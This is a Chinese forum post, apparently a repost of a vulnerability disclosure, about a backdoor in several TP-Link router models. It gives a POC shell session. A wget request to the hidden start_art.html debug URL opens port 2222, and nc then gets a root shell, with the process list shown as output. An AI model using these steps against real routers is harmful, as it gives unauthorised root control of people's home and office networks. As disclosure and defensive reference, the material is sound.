TP-Link路由器后门
TP-LINK部分型号的路由器存在某个无需授权认证的特定功能页面(start_art.html),攻击者访问页面之后可引导路由器自动从攻击者控制的TFTP服务器下载恶意程序并以root权限执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令,从而可完全控制路由器。目前已知受影响的路由器型号包括: TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N。 其他型号也可能受到影响。这些产品主要应用于企业或家庭局域网的组建。POC:
代码:
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: "start_art.html"
[ <=> ] 426 --.-K/s in 0s
2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved
root@secu:~# nc 192.168.0.1 2222
ps
PIDUid VmSize Stat Command
1 root 404 S init
2 root SW<
3 root SW<
4 root SW<
5 root SW<
6 root SW<
7 root SW<
8 root SW
9 root SW
10 root SW<
17 root SW<
18 root SW<
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW<
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd {:soso_e100:} 完全看不懂 来来来来点金币
页:
[1]